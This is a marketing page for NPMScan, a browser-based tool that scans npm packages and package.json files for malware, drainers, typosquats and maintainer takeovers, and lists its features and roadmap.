Why NPMScan

Why we built NPMScan

Too many teams still npm i blind. Recent npm waves (drainers, typosquats, maintainer takeovers) showed how fast a bad release slips into CI and ships to prod. We wanted a dead-simple preflight check that catches malware now, not just CVEs from last year.

What’s different vs. the usual scanners

• Active malware intel: live feed of malicious packages/campaigns, not just advisory databases.
• Drainer & takeover heuristics: flags obfuscated postinstall scripts, suspicious maintainer changes, exfil patterns, clipboard/crypto hooks.
• Zero setup: paste package.json or enter package@version → instant risk snapshot.
• Release diffing: highlights risky jumps (new scripts/bins/deps) so you can pin or skip.
• CI optional: great in-browser; API/CLI if you want gates later.

It’s fast, blunt, and practical. No login, no fluff — just “is this safe to install?” in seconds.

No source code required

If you don’t trust anyone (good instinct), don’t upload your repo — just share package.json.

No installs, no extensions

You don’t need to install anything. Even VS Code extensions can touch env vars or run scripts; NPMScan runs in your browser, read-only.

One-page context you usually click around for

See latest commits, open issues, and maintainer info for each package on a single page. On GitHub you’d bounce between tabs; here it’s consolidated.

Trust but verify

We show the raw facts (commits/issues/maintainers/scripts/diffs) so you can do your own analysis if you don’t want to rely on ours.

Roadmap (tell us what to prioritize)

• GitHub App PR comments
• Lockfile diff guard
• VS Code extension (strictly read-only)
• Private registry proxy with policy
• SBOM export + API

We’re a team focused on practical supply‑chain safety. Tell us what would help your workflows most.